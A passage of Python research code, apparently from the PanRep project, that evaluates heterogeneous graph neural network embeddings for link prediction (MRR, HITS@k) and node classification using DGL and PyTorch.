test_neg_ttypes = th.cat([valid_neg_ttypes, test_ttypes])
test_head_ids = (test_src)
test_tail_ids = (test_dst)
test_etypes = (test_rel)
test_neg_head_ids = th.cat([valid_neg_head_ids, test_head_ids])
test_neg_tail_ids = th.cat([valid_neg_tail_ids, test_tail_ids])
test_neg_etypes = th.cat([valid_neg_etypes, test_etypes])
pos_pairs = (test_head_ids, test_etypes, test_tail_ids, test_htypes, test_ttypes)
neg_pairs = (test_neg_head_ids, test_neg_etypes, test_neg_tail_ids, test_neg_htypes, test_neg_ttypes)
return pos_pairs, neg_pairs
def creat_eval_minibatch(test_g, n_layers):
eval_minibatch_blocks = []
eval_minibatch_info = []
for ntype in test_g.ntypes:
n_nodes = test_g.number_of_nodes(ntype)
eval_minibatch = 512
for i in range(int((n_nodes + eval_minibatch - 1) // eval_minibatch)):
cur = {}
valid_blocks = []
cur[ntype] = th.arange(i * eval_minibatch,
(i + 1) * eval_minibatch \
if (i + 1) * eval_minibatch < n_nodes \
else n_nodes)
# record the seed
eval_minibatch_info.append((ntype, cur[ntype]))
for _ in range(n_layers):
#print(cur)
frontier = dgl.in_subgraph(test_g, cur)
block = dgl.to_block(frontier, cur)
cur = {}
for s_ntype in block.srctypes:
cur[s_ntype] = block.srcnodes[s_ntype].data[dgl.NID]
block=block.to(device)
valid_blocks.insert(0, block)
eval_minibatch_blocks.append(valid_blocks)
for i in range(len(eval_minibatch_blocks)):
for ntype in eval_minibatch_blocks[i][0].ntypes:
if eval_minibatch_blocks[i][0].number_of_src_nodes(ntype)>0:
if test_g.nodes[ntype].data.get("h_f", None) is not None:
eval_minibatch_blocks[i][0].srcnodes[ntype].data['h_f'] = test_g.nodes[ntype].data['h_f'][
eval_minibatch_blocks[i][0].srcnodes[ntype].data['_ID']].to(device)
return eval_minibatch_info, eval_minibatch_blocks
def fullgraph_eval(eval_g, model,embeddings, device, dim_size,
pos_pairs, neg_pairs, eval_neg_cnt,ntype2id,etype2id):
model.eval()
t0 = time.time()
p_h = embeddings
with th.no_grad():
test_head_ids, test_etypes, test_tail_ids, test_htypes, test_ttypes = pos_pairs
test_neg_head_ids, _, test_neg_tail_ids, test_neg_htypes, test_neg_ttypes = neg_pairs
mrr = 0
mr = 0
hit1 = 0
hit3 = 0
hit10 = 0
pos_batch_size = 1000
pos_cnt = test_head_ids.shape[0]
total_cnt = 0
# unique test head and tail nodes
if test_htypes is None:
unique_neg_head_ids = th.unique(test_neg_head_ids)
unique_neg_tail_ids = th.unique(test_neg_tail_ids)
unique_neg_htypes = None
unique_neg_ttypes = None
else:
unique_neg_head_ids = []
unique_neg_tail_ids = []
unique_neg_htypes = []
unique_neg_ttypes = []
for nt in eval_g.ntypes:
cols = (test_neg_htypes == ntype2id[nt])
unique_ids = th.unique(test_neg_head_ids[cols])
unique_neg_head_ids.append(unique_ids)
unique_neg_htypes.append(th.full((unique_ids.shape[0],), ntype2id[nt]))
cols = (test_neg_ttypes == ntype2id[nt])
unique_ids = th.unique(test_neg_tail_ids[cols])
unique_neg_tail_ids.append(unique_ids)
unique_neg_ttypes.append(th.full((unique_ids.shape[0],), ntype2id[nt]))
unique_neg_head_ids = th.cat(unique_neg_head_ids)
unique_neg_tail_ids = th.cat(unique_neg_tail_ids)
unique_neg_htypes = th.cat(unique_neg_htypes)
unique_neg_ttypes = th.cat(unique_neg_ttypes)
if eval_neg_cnt > 0:
total_neg_head_seed = th.randint(unique_neg_head_ids.shape[0],
(eval_neg_cnt * ((pos_cnt // pos_batch_size) + 1),))
total_neg_tail_seed = th.randint(unique_neg_tail_ids.shape[0],
(eval_neg_cnt * ((pos_cnt // pos_batch_size) + 1),))
for p_i in range(int((pos_cnt + pos_batch_size - 1) // pos_batch_size)):
print("Eval {}-{}".format(p_i * pos_batch_size,
(p_i + 1) * pos_batch_size \
if (p_i + 1) * pos_batch_size < pos_cnt \
else pos_cnt))
sub_test_head_ids = test_head_ids[p_i * pos_batch_size: \
(p_i + 1) * pos_batch_size \
if (p_i + 1) * pos_batch_size < pos_cnt \
else pos_cnt]
sub_test_etypes = test_etypes[p_i * pos_batch_size: \
(p_i + 1) * pos_batch_size \
if (p_i + 1) * pos_batch_size < pos_cnt \
else pos_cnt]
sub_test_tail_ids = test_tail_ids[p_i * pos_batch_size: \
(p_i + 1) * pos_batch_size \
if (p_i + 1) * pos_batch_size < pos_cnt \
else pos_cnt]
if test_htypes is None:
phead_emb = p_h['node'][sub_test_head_ids]
ptail_emb = p_h['node'][sub_test_tail_ids]
else:
sub_test_htypes = test_htypes[p_i * pos_batch_size: \
(p_i + 1) * pos_batch_size \
if (p_i + 1) * pos_batch_size < pos_cnt \
else pos_cnt]
sub_test_ttypes = test_ttypes[p_i * pos_batch_size: \
(p_i + 1) * pos_batch_size \
if (p_i + 1) * pos_batch_size < pos_cnt \
else pos_cnt]
phead_emb = th.empty((sub_test_head_ids.shape[0], dim_size), device=device)
ptail_emb = th.empty((sub_test_tail_ids.shape[0], dim_size), device=device)
for nt in eval_g.ntypes:
if nt in p_h:
loc = (sub_test_htypes == ntype2id[nt])
phead_emb[loc] = p_h[nt][sub_test_head_ids[loc]]
loc = (sub_test_ttypes == ntype2id[nt])
ptail_emb[loc] = p_h[nt][sub_test_tail_ids[loc]]
pos_scores = model.calc_pos_score_with_rids(phead_emb, ptail_emb, sub_test_etypes,etype2id,device)
pos_scores = F.logsigmoid(pos_scores).reshape(phead_emb.shape[0], -1).detach().cpu()
if eval_neg_cnt > 0:
neg_head_seed = total_neg_head_seed[p_i * eval_neg_cnt:(p_i + 1) * eval_neg_cnt]
neg_tail_seed = total_neg_tail_seed[p_i * eval_neg_cnt:(p_i + 1) * eval_neg_cnt]
seed_test_neg_head_ids = unique_neg_head_ids[neg_head_seed]
seed_test_neg_tail_ids = unique_neg_tail_ids[neg_tail_seed]
if test_neg_htypes is not None:
seed_test_neg_htypes = unique_neg_htypes[neg_head_seed]
seed_test_neg_ttypes = unique_neg_ttypes[neg_tail_seed]
else:
seed_test_neg_head_ids = unique_neg_head_ids
seed_test_neg_tail_ids = unique_neg_tail_ids
seed_test_neg_htypes = unique_neg_htypes
seed_test_neg_ttypes = unique_neg_ttypes
neg_batch_size = 10000
head_neg_cnt = seed_test_neg_head_ids.shape[0]
tail_neg_cnt = seed_test_neg_tail_ids.shape[0]
t_neg_score = []
h_neg_score = []
for n_i in range(int((head_neg_cnt + neg_batch_size - 1) // neg_batch_size)):
sub_test_neg_head_ids = seed_test_neg_head_ids[n_i * neg_batch_size: \
(n_i + 1) * neg_batch_size \
if (n_i + 1) * neg_batch_size < head_neg_cnt
else head_neg_cnt]
if test_htypes is None:
nhead_emb = p_h['node'][sub_test_neg_head_ids]
else:
sub_test_neg_htypes = seed_test_neg_htypes[n_i * neg_batch_size: \
(n_i + 1) * neg_batch_size \
if (n_i + 1) * neg_batch_size < head_neg_cnt
else head_neg_cnt]
nhead_emb = th.empty((sub_test_neg_head_ids.shape[0], dim_size), device=device)
for nt in eval_g.ntypes:
if nt in p_h:
loc = (sub_test_neg_htypes == ntype2id[nt])
nhead_emb[loc] = p_h[nt][sub_test_neg_head_ids[loc]]
h_neg_score.append(
model.calc_neg_head_score(nhead_emb,
ptail_emb,
sub_test_etypes,
1,
ptail_emb.shape[0],
nhead_emb.shape[0],etype2id,device).reshape(-1, nhead_emb.shape[
0]).detach().cpu())
for n_i in range(int((tail_neg_cnt + neg_batch_size - 1) // neg_batch_size)):
sub_test_neg_tail_ids = seed_test_neg_tail_ids[n_i * neg_batch_size: \
(n_i + 1) * neg_batch_size \
if (n_i + 1) * neg_batch_size < tail_neg_cnt
else tail_neg_cnt]
if test_htypes is None:
ntail_emb = p_h['node'][sub_test_neg_tail_ids]
else:
sub_test_neg_ttypes = seed_test_neg_ttypes[n_i * neg_batch_size: \
(n_i + 1) * neg_batch_size \
if (n_i + 1) * neg_batch_size < tail_neg_cnt
else tail_neg_cnt]
ntail_emb = th.empty((sub_test_neg_tail_ids.shape[0], dim_size), device=device)
for nt in eval_g.ntypes:
if nt in p_h:
loc = (sub_test_neg_ttypes == ntype2id[nt])
ntail_emb[loc] = p_h[nt][sub_test_neg_tail_ids[loc]]
t_neg_score.append(model.calc_neg_tail_score(phead_emb,
ntail_emb,
sub_test_etypes,
1,
phead_emb.shape[0],
ntail_emb.shape[0],etype2id,device).reshape(-1, ntail_emb.shape[
0]).detach().cpu())
t_neg_score = th.cat(t_neg_score, dim=1)
h_neg_score = th.cat(h_neg_score, dim=1)
t_neg_score = F.logsigmoid(t_neg_score)
h_neg_score = F.logsigmoid(h_neg_score)
canonical_etypes = eval_g.canonical_etypes
for idx in range(phead_emb.shape[0]):
if test_htypes is None:
tail_pos = eval_g.has_edges_between(
th.full((seed_test_neg_tail_ids.shape[0],), sub_test_head_ids[idx]).long(),
seed_test_neg_tail_ids,
etype=test_g.etypes[(sub_test_etypes[idx].numpy().item())])
head_pos = eval_g.has_edges_between(seed_test_neg_head_ids,
th.full((seed_test_neg_head_ids.shape[0],),
sub_test_tail_ids[idx]).long(),
etype=test_g.etypes[(sub_test_etypes[idx].numpy().item())])
loc = tail_pos == 1
t_neg_score[idx][loc] += pos_scores[idx]
loc = head_pos == 1
h_neg_score[idx][loc] += pos_scores[idx]
else:
head_type = test_g.ntypes[(sub_test_htypes[idx].numpy())]
tail_type = test_g.ntypes[(sub_test_ttypes[idx].numpy())]
for t in eval_g.ntypes:
if (head_type, test_g.etypes[(sub_test_etypes[idx].numpy().item())], t) in canonical_etypes:
loc = (seed_test_neg_ttypes == ntype2id[t])
t_neg_tail_ids = seed_test_neg_tail_ids[loc]
# there is some neg tail in this type
if t_neg_tail_ids.shape[0] > 0:
tail_pos = eval_g.has_edges_between(
th.full((t_neg_tail_ids.shape[0],), sub_test_head_ids[idx]).long(),
t_neg_tail_ids,
etype=(head_type,
test_g.etypes[(sub_test_etypes[idx].numpy().item())],
t))
t_neg_score[idx][loc][tail_pos == 1] += pos_scores[idx]
if (t, test_g.etypes[(sub_test_etypes[idx].numpy().item())], tail_type) in canonical_etypes:
loc = (seed_test_neg_htypes == ntype2id[t])
t_neg_head_ids = seed_test_neg_head_ids[loc]
# there is some neg head in this type
if t_neg_head_ids.shape[0] > 0:
head_pos = eval_g.has_edges_between(t_neg_head_ids,
th.full((t_neg_head_ids.shape[0],),
sub_test_tail_ids[idx]).long(),
etype=(t,
test_g.etypes[(sub_test_etypes[idx].numpy().item())]
,
tail_type))
h_neg_score[idx][loc][head_pos == 1] += pos_scores[idx]
neg_score = th.cat([h_neg_score, t_neg_score], dim=1)
rankings = th.sum(neg_score >= pos_scores, dim=1) + 1
rankings = rankings.cpu().detach().numpy()
for ranking in rankings:
mrr += 1.0 / ranking
mr += float(ranking)
hit1 += 1.0 if ranking <= 1 else 0.0
hit3 += 1.0 if ranking <= 3 else 0.0
hit10 += 1.0 if ranking <= 10 else 0.0
total_cnt += 1
res="MRR {}\nMR {}\nHITS@1 {}\nHITS@3 {}\nHITS@10 {}".format(mrr / total_cnt,
mr / total_cnt,
hit1 / total_cnt,
hit3 / total_cnt,
hit10 / total_cnt)
print("MRR {}\nMR {}\nHITS@1 {}\nHITS@3 {}\nHITS@10 {}".format(mrr / total_cnt,
mr / total_cnt,
hit1 / total_cnt,
hit3 / total_cnt,
hit10 / total_cnt))
t1 = time.time()
print("Full eval {} exmpales takes {} seconds".format(pos_scores.shape[0], t1 - t0))
return res
ntype2id = {}
for i, ntype in enumerate(test_g.ntypes):
ntype2id[ntype] = i
etype2id = {}
for i, etype in enumerate(test_g.etypes):
etype2id[etype] = i
train_data=transform_triplets(train_edges, etype2id, ntype2id)
valid_data = transform_triplets(valid_edges, etype2id, ntype2id)
test_data = transform_triplets(test_edges, etype2id, ntype2id)
pos_pairs, neg_pairs=prepare_triplets(train_data, valid_data, test_data)
#minibatch_info, minibatch_blocks=creat_eval_minibatch(test_g, n_layers)
res=fullgraph_eval(test_g, model,embeddings, device, dim_size,
pos_pairs, neg_pairs, eval_neg_cnt,ntype2id,etype2id)
return res
def evaluate_panrep_fn_for_node_classification(model, val_loader, device, labels, category, loss_func, multilabel=False):
model.eval()
total_acc=0
total_loss = 0
count=0
for i, (seeds, blocks) in enumerate(val_loader):
# need to copy the features
for i in range(len(blocks)):
blocks[i] = blocks[i].to(device)
lbl = labels[seeds[category]]
logits = model.classifier_forward_mb(blocks)[category]
loss = loss_func(logits, lbl)
pred = torch.sigmoid(logits)
if multilabel is False:
pred = pred.argmax(dim=1)
else:
pred = pred
acc = compute_acc(pred, lbl, multilabel)
total_acc += acc
total_loss += loss.item() * len(seeds)
pred = pred.cpu().numpy()
count+=len(seeds)
return total_loss/count, total_acc/count
def evaluation_link_prediction(test_g,model,train_edges,valid_edges,test_edges,dim_size,eval_neg_cnt,n_layers,device):
def transform_triplets(train_edges,etype2id,ntype2id):
train_src = None
# TODO have to map the etype and ntype to their integer ids.
for key in train_edges.keys():
if train_src is None:
train_src = train_edges[key][0]
train_dst = train_edges[key][1]
train_rel = th.tensor(etype2id[key[1]]).repeat((train_src.shape[0]))
train_src_type = th.tensor(ntype2id[key[0]]).repeat((train_src.shape[0]))
train_dst_type = th.tensor(ntype2id[key[2]]).repeat((train_src.shape[0]))
else:
train_src = torch.cat((train_src, train_edges[key][0]))
train_dst = torch.cat((train_dst, train_edges[key][1]))
train_rel = torch.cat((train_rel, th.tensor(etype2id[key[1]]).repeat((train_edges[key][0].shape[0]))))
train_src_type = torch.cat(
(train_src_type, th.tensor(ntype2id[key[0]]).repeat((train_edges[key][0].shape[0]))))
train_dst_type = torch.cat(
(train_dst_type, th.tensor(ntype2id[key[2]]).repeat((train_edges[key][0].shape[0]))))
perm=torch.randperm(train_src.shape[0])
train_src=train_src[perm]
train_dst = train_dst[perm]
train_src_type = train_src_type[perm]
train_rel = train_rel[perm]
train_dst_type = train_dst_type[perm]
return (train_src,train_dst,train_src_type,train_rel,train_dst_type)
def prepare_triplets(train_data, valid_data, test_data):
if len(train_data) == 3:
train_src, train_rel, train_dst = train_data
train_htypes = None
train_ttypes = None
else:
assert len(train_data) == 5
train_src, train_dst, train_src_type, train_rel, train_dst_type = train_data
train_htypes = (train_src_type)
train_ttypes = (train_dst_type)
head_ids = (train_src)
tail_ids = (train_dst)
etypes = (train_rel)
num_train_edges = etypes.shape[0]
# pos_seed = th.arange(batch_size * 5000) #num_train_edges//batch_size) * batch_size)
if len(valid_data) == 3:
valid_src, valid_rel, valid_dst = valid_data
valid_htypes = None
valid_ttypes = None
valid_neg_htypes = None
valid_neg_ttypes = None
else:
assert len(valid_data) == 5
valid_src, valid_dst, valid_src_trype, valid_rel, valid_dst_type = valid_data
valid_htypes = (valid_src_trype)
valid_ttypes = (valid_dst_type)
valid_neg_htypes = th.cat([train_htypes, valid_htypes])
valid_neg_ttypes = th.cat([train_ttypes, valid_ttypes])
valid_head_ids = (valid_src)
valid_tail_ids = (valid_dst)
valid_etypes = (valid_rel)
valid_neg_head_ids = th.cat([head_ids, valid_head_ids])
valid_neg_tail_ids = th.cat([tail_ids, valid_tail_ids])
valid_neg_etypes = th.cat([etypes, valid_etypes])
num_valid_edges = valid_etypes.shape[0] + num_train_edges
valid_seed = th.arange(valid_etypes.shape[0])
if len(test_data) == 3:
test_src, test_rel, test_dst = test_data
test_htypes = None
test_ttypes = None
test_neg_htypes = None
test_neg_ttypes = None
else:
assert len(test_data) == 5
test_src, test_dst, test_src_type, test_rel, test_dst_type = test_data
test_htypes = (test_src_type)
test_ttypes = (test_dst_type)
test_neg_htypes = th.cat([valid_neg_htypes, test_htypes])
test_neg_ttypes = th.cat([valid_neg_ttypes, test_ttypes])
test_head_ids = (test_src)
test_tail_ids = (test_dst)
test_etypes = (test_rel)
test_neg_head_ids = th.cat([valid_neg_head_ids, test_head_ids])
test_neg_tail_ids = th.cat([valid_neg_tail_ids, test_tail_ids])
test_neg_etypes = th.cat([valid_neg_etypes, test_etypes])
pos_pairs = (test_head_ids, test_etypes, test_tail_ids, test_htypes, test_ttypes)
neg_pairs = (test_neg_head_ids, test_neg_etypes, test_neg_tail_ids, test_neg_htypes, test_neg_ttypes)
return pos_pairs, neg_pairs
def creat_eval_minibatch(test_g, n_layers):
eval_minibatch_blocks = []
eval_minibatch_info = []
for ntype in test_g.ntypes:
n_nodes = test_g.number_of_nodes(ntype)
eval_minibatch = 512
for i in range(int((n_nodes + eval_minibatch - 1) // eval_minibatch)):
cur = {}
valid_blocks = []
cur[ntype] = th.arange(i * eval_minibatch,
(i + 1) * eval_minibatch \
if (i + 1) * eval_minibatch < n_nodes \
else n_nodes)
# record the seed
eval_minibatch_info.append((ntype, cur[ntype]))
for _ in range(n_layers):
#print(cur)
frontier = dgl.in_subgraph(test_g, cur)
block = dgl.to_block(frontier, cur)
cur = {}
for s_ntype in block.srctypes:
cur[s_ntype] = block.srcnodes[s_ntype].data[dgl.NID]
block=block.to(device)
valid_blocks.insert(0, block)
eval_minibatch_blocks.append(valid_blocks)
for i in range(len(eval_minibatch_blocks)):
for ntype in eval_minibatch_blocks[i][0].ntypes:
if eval_minibatch_blocks[i][0].number_of_src_nodes(ntype)>0:
if test_g.nodes[ntype].data.get("h_f", None) is not None:
eval_minibatch_blocks[i][0].srcnodes[ntype].data['h_f'] = test_g.nodes[ntype].data['h_f'][
eval_minibatch_blocks[i][0].srcnodes[ntype].data['_ID']].to(device)
return eval_minibatch_info, eval_minibatch_blocks
def fullgraph_eval(eval_g, model, device, dim_size, minibatch_blocks, minibatch_info,
pos_pairs, neg_pairs, eval_neg_cnt,ntype2id,etype2id):
model.eval()
t0 = time.time()
p_h = {}
with th.no_grad():
for i, blocks in enumerate(minibatch_blocks):
mp_h = model.encoder.forward_mb(blocks)
mini_ntype, mini_idx = minibatch_info[i]
if p_h.get(mini_ntype, None) is None:
p_h[mini_ntype] = th.empty((eval_g.number_of_nodes(mini_ntype), dim_size), device=device)
p_h[mini_ntype][mini_idx] = mp_h[mini_ntype]
test_head_ids, test_etypes, test_tail_ids, test_htypes, test_ttypes = pos_pairs
test_neg_head_ids, _, test_neg_tail_ids, test_neg_htypes, test_neg_ttypes = neg_pairs
mrr = 0
mr = 0
hit1 = 0
hit3 = 0
hit10 = 0
pos_batch_size = 1000
pos_cnt = test_head_ids.shape[0]
total_cnt = 0
# unique test head and tail nodes
if test_htypes is None:
unique_neg_head_ids = th.unique(test_neg_head_ids)
unique_neg_tail_ids = th.unique(test_neg_tail_ids)
unique_neg_htypes = None
unique_neg_ttypes = None
else:
unique_neg_head_ids = []
unique_neg_tail_ids = []
unique_neg_htypes = []
unique_neg_ttypes = []
for nt in eval_g.ntypes:
cols = (test_neg_htypes == ntype2id[nt])
unique_ids = th.unique(test_neg_head_ids[cols])
unique_neg_head_ids.append(unique_ids)
unique_neg_htypes.append(th.full((unique_ids.shape[0],), ntype2id[nt]))
cols = (test_neg_ttypes == ntype2id[nt])
unique_ids = th.unique(test_neg_tail_ids[cols])
unique_neg_tail_ids.append(unique_ids)
unique_neg_ttypes.append(th.full((unique_ids.shape[0],), ntype2id[nt]))
unique_neg_head_ids = th.cat(unique_neg_head_ids)
unique_neg_tail_ids = th.cat(unique_neg_tail_ids)
unique_neg_htypes = th.cat(unique_neg_htypes)
unique_neg_ttypes = th.cat(unique_neg_ttypes)
if eval_neg_cnt > 0:
total_neg_head_seed = th.randint(unique_neg_head_ids.shape[0],
(eval_neg_cnt * ((pos_cnt // pos_batch_size) + 1),))
total_neg_tail_seed = th.randint(unique_neg_tail_ids.shape[0],
(eval_neg_cnt * ((pos_cnt // pos_batch_size) + 1),))
for p_i in range(int((pos_cnt + pos_batch_size - 1) // pos_batch_size)):
print("Eval {}-{}".format(p_i * pos_batch_size,
(p_i + 1) * pos_batch_size \
if (p_i + 1) * pos_batch_size < pos_cnt \
else pos_cnt))
sub_test_head_ids = test_head_ids[p_i * pos_batch_size: \
(p_i + 1) * pos_batch_size \
if (p_i + 1) * pos_batch_size < pos_cnt \
else pos_cnt]
sub_test_etypes = test_etypes[p_i * pos_batch_size: \
(p_i + 1) * pos_batch_size \
if (p_i + 1) * pos_batch_size < pos_cnt \
else pos_cnt]
sub_test_tail_ids = test_tail_ids[p_i * pos_batch_size: \
(p_i + 1) * pos_batch_size \
if (p_i + 1) * pos_batch_size < pos_cnt \
else pos_cnt]
if test_htypes is None:
phead_emb = p_h['node'][sub_test_head_ids]
ptail_emb = p_h['node'][sub_test_tail_ids]
else:
sub_test_htypes = test_htypes[p_i * pos_batch_size: \
(p_i + 1) * pos_batch_size \
if (p_i + 1) * pos_batch_size < pos_cnt \
else pos_cnt]
sub_test_ttypes = test_ttypes[p_i * pos_batch_size: \
(p_i + 1) * pos_batch_size \
if (p_i + 1) * pos_batch_size < pos_cnt \
else pos_cnt]
phead_emb = th.empty((sub_test_head_ids.shape[0], dim_size), device=device)
ptail_emb = th.empty((sub_test_tail_ids.shape[0], dim_size), device=device)
for nt in eval_g.ntypes:
if nt in p_h:
loc = (sub_test_htypes == ntype2id[nt])
phead_emb[loc] = p_h[nt][sub_test_head_ids[loc]]
loc = (sub_test_ttypes == ntype2id[nt])
ptail_emb[loc] = p_h[nt][sub_test_tail_ids[loc]]
pos_scores = model.linkPredictor.calc_pos_score_with_rids(phead_emb, ptail_emb, sub_test_etypes,etype2id,device)
pos_scores = F.logsigmoid(pos_scores).reshape(phead_emb.shape[0], -1).detach().cpu()
if eval_neg_cnt > 0:
neg_head_seed = total_neg_head_seed[p_i * eval_neg_cnt:(p_i + 1) * eval_neg_cnt]
neg_tail_seed = total_neg_tail_seed[p_i * eval_neg_cnt:(p_i + 1) * eval_neg_cnt]
seed_test_neg_head_ids = unique_neg_head_ids[neg_head_seed]
seed_test_neg_tail_ids = unique_neg_tail_ids[neg_tail_seed]
if test_neg_htypes is not None:
seed_test_neg_htypes = unique_neg_htypes[neg_head_seed]
seed_test_neg_ttypes = unique_neg_ttypes[neg_tail_seed]
else:
seed_test_neg_head_ids = unique_neg_head_ids
seed_test_neg_tail_ids = unique_neg_tail_ids
seed_test_neg_htypes = unique_neg_htypes
seed_test_neg_ttypes = unique_neg_ttypes
neg_batch_size = 10000
head_neg_cnt = seed_test_neg_head_ids.shape[0]
tail_neg_cnt = seed_test_neg_tail_ids.shape[0]
t_neg_score = []
h_neg_score = []
for n_i in range(int((head_neg_cnt + neg_batch_size - 1) // neg_batch_size)):
sub_test_neg_head_ids = seed_test_neg_head_ids[n_i * neg_batch_size: \
(n_i + 1) * neg_batch_size \
if (n_i + 1) * neg_batch_size < head_neg_cnt
else head_neg_cnt]
if test_htypes is None:
nhead_emb = p_h['node'][sub_test_neg_head_ids]
else:
sub_test_neg_htypes = seed_test_neg_htypes[n_i * neg_batch_size: \
(n_i + 1) * neg_batch_size \
if (n_i + 1) * neg_batch_size < head_neg_cnt
else head_neg_cnt]
nhead_emb = th.empty((sub_test_neg_head_ids.shape[0], dim_size), device=device)
for nt in eval_g.ntypes:
if nt in p_h:
loc = (sub_test_neg_htypes == ntype2id[nt])
nhead_emb[loc] = p_h[nt][sub_test_neg_head_ids[loc]]
h_neg_score.append(
model.linkPredictor.calc_neg_head_score(nhead_emb,
ptail_emb,
sub_test_etypes,
1,
ptail_emb.shape[0],
nhead_emb.shape[0],etype2id,device).reshape(-1, nhead_emb.shape[
0]).detach().cpu())
for n_i in range(int((tail_neg_cnt + neg_batch_size - 1) // neg_batch_size)):
sub_test_neg_tail_ids = seed_test_neg_tail_ids[n_i * neg_batch_size: \
(n_i + 1) * neg_batch_size \
if (n_i + 1) * neg_batch_size < tail_neg_cnt
else tail_neg_cnt]
if test_htypes is None:
ntail_emb = p_h['node'][sub_test_neg_tail_ids]
else:
sub_test_neg_ttypes = seed_test_neg_ttypes[n_i * neg_batch_size: \
(n_i + 1) * neg_batch_size \
if (n_i + 1) * neg_batch_size < tail_neg_cnt
else tail_neg_cnt]
ntail_emb = th.empty((sub_test_neg_tail_ids.shape[0], dim_size), device=device)
for nt in eval_g.ntypes:
if nt in p_h:
loc = (sub_test_neg_ttypes == ntype2id[nt])
ntail_emb[loc] = p_h[nt][sub_test_neg_tail_ids[loc]]
t_neg_score.append(model.linkPredictor.calc_neg_tail_score(phead_emb,
ntail_emb,
sub_test_etypes,
1,
phead_emb.shape[0],
ntail_emb.shape[0],etype2id,device).reshape(-1, ntail_emb.shape[
0]).detach().cpu())
t_neg_score = th.cat(t_neg_score, dim=1)
h_neg_score = th.cat(h_neg_score, dim=1)
t_neg_score = F.logsigmoid(t_neg_score)
h_neg_score = F.logsigmoid(h_neg_score)
canonical_etypes = eval_g.canonical_etypes
for idx in range(phead_emb.shape[0]):
if test_htypes is None:
tail_pos = eval_g.has_edges_between(
th.full((seed_test_neg_tail_ids.shape[0],), sub_test_head_ids[idx]).long(),
seed_test_neg_tail_ids,
etype=test_g.etypes[(sub_test_etypes[idx].numpy().item())])
head_pos = eval_g.has_edges_between(seed_test_neg_head_ids,
th.full((seed_test_neg_head_ids.shape[0],),
sub_test_tail_ids[idx]).long(),
etype=test_g.etypes[(sub_test_etypes[idx].numpy().item())])
loc = tail_pos == 1
t_neg_score[idx][loc] += pos_scores[idx]
loc = head_pos == 1
h_neg_score[idx][loc] += pos_scores[idx]
else:
head_type = test_g.ntypes[(sub_test_htypes[idx].numpy())]
tail_type = test_g.ntypes[(sub_test_ttypes[idx].numpy())]
for t in eval_g.ntypes:
if (head_type, test_g.etypes[(sub_test_etypes[idx].numpy().item())], t) in canonical_etypes:
loc = (seed_test_neg_ttypes == ntype2id[t])
t_neg_tail_ids = seed_test_neg_tail_ids[loc]
# there is some neg tail in this type
if t_neg_tail_ids.shape[0] > 0:
tail_pos = eval_g.has_edges_between(
th.full((t_neg_tail_ids.shape[0],), sub_test_head_ids[idx]).long(),
t_neg_tail_ids,
etype=(head_type,
test_g.etypes[(sub_test_etypes[idx].numpy().item())],
t))
t_neg_score[idx][loc][tail_pos == 1] += pos_scores[idx]
if (t, test_g.etypes[(sub_test_etypes[idx].numpy().item())], tail_type) in canonical_etypes:
loc = (seed_test_neg_htypes == ntype2id[t])
t_neg_head_ids = seed_test_neg_head_ids[loc]
# there is some neg head in this type
if t_neg_head_ids.shape[0] > 0:
head_pos = eval_g.has_edges_between(t_neg_head_ids,
th.full((t_neg_head_ids.shape[0],),
sub_test_tail_ids[idx]).long(),
etype=(t,
test_g.etypes[(sub_test_etypes[idx].numpy().item())]
,
tail_type))
h_neg_score[idx][loc][head_pos == 1] += pos_scores[idx]
neg_score = th.cat([h_neg_score, t_neg_score], dim=1)
rankings = th.sum(neg_score >= pos_scores, dim=1) + 1
rankings = rankings.cpu().detach().numpy()
for ranking in rankings:
mrr += 1.0 / ranking
mr += float(ranking)
hit1 += 1.0 if ranking <= 1 else 0.0
hit3 += 1.0 if ranking <= 3 else 0.0
hit10 += 1.0 if ranking <= 10 else 0.0
total_cnt += 1
res="MRR {}\nMR {}\nHITS@1 {}\nHITS@3 {}\nHITS@10 {}".format(mrr / total_cnt,
mr / total_cnt,
hit1 / total_cnt,
hit3 / total_cnt,
hit10 / total_cnt)
print("MRR {}\nMR {}\nHITS@1 {}\nHITS@3 {}\nHITS@10 {}".format(mrr / total_cnt,
mr / total_cnt,
hit1 / total_cnt,
hit3 / total_cnt,
hit10 / total_cnt))
t1 = time.time()
print("Full eval {} exmpales takes {} seconds".format(pos_scores.shape[0], t1 - t0))
return res
ntype2id = {}
for i, ntype in enumerate(test_g.ntypes):
ntype2id[ntype] = i
etype2id = {}
for i, etype in enumerate(test_g.etypes):
etype2id[etype] = i
train_data=transform_triplets(train_edges, etype2id, ntype2id)
valid_data = transform_triplets(valid_edges, etype2id, ntype2id)
test_data = transform_triplets(test_edges, etype2id, ntype2id)
pos_pairs, neg_pairs=prepare_triplets(train_data, valid_data, test_data)
minibatch_info, minibatch_blocks=creat_eval_minibatch(test_g, n_layers)
res=fullgraph_eval(test_g, model, device, dim_size, minibatch_blocks, minibatch_info,
pos_pairs, neg_pairs, eval_neg_cnt,ntype2id,etype2id)
return res
def direct_eval_lppr_link_prediction(test_g, model, train_edges, valid_edges, test_edges, n_hidden,n_layers, eval_neg_cnt=100,use_cuda=True):
# evaluate PanRep LP module for link prediction
if use_cuda:
model.cpu()
test_g = test_g.to(torch.device("cpu"))
pr_mrr = "PanRep LP "
pr_mrr += evaluation_link_prediction(test_g, model, train_edges, valid_edges, test_edges, dim_size=n_hidden,
eval_neg_cnt=eval_neg_cnt,
n_layers=n_layers,
device=torch.device("cpu"))
if use_cuda:
model.cuda()
return pr_mrr
def direct_eval_pr_link_prediction(train_g,test_g,train_edges, valid_edges, test_edges,fanout,batch_size,n_hidden,ntype2id,ng_rate,l2norm,
n_layers,n_lp_epochs,embeddings,use_cuda,device):
sampler = InfomaxNodeRecNeighborSampler(train_g, [fanout] * (n_layers), device=device)
pr_train_ind=list(sampler.hetero_map.keys())
lp_sampler = LinkPredictorEvalSampler(train_g, [fanout] * (1),device=device)
lp_loader = DataLoader(dataset=pr_train_ind,
batch_size=batch_size,
collate_fn=lp_sampler.sample_blocks,
shuffle=True,
num_workers=0)
lp_model=DLinkPredictorOnlyRel(out_dim=n_hidden,etypes=train_g.etypes,ntype2id=ntype2id,edg_pct=1,ng_rate=ng_rate,use_cuda=True)
if use_cuda:
lp_model.cuda()
lp_optimizer = torch.optim.Adam(lp_model.parameters(), lr=5e-2, weight_decay=l2norm)
for epoch in range(n_lp_epochs):
lp_model.train()
lp_optimizer.zero_grad()
for i, (seeds, blocks) in enumerate(lp_loader):
embs={}
for ntype in seeds:
embs[ntype]=embeddings[ntype][seeds[ntype]].to(device)
loss= lp_model.forward_mb(g=blocks[0],embed=embs)
loss.backward()
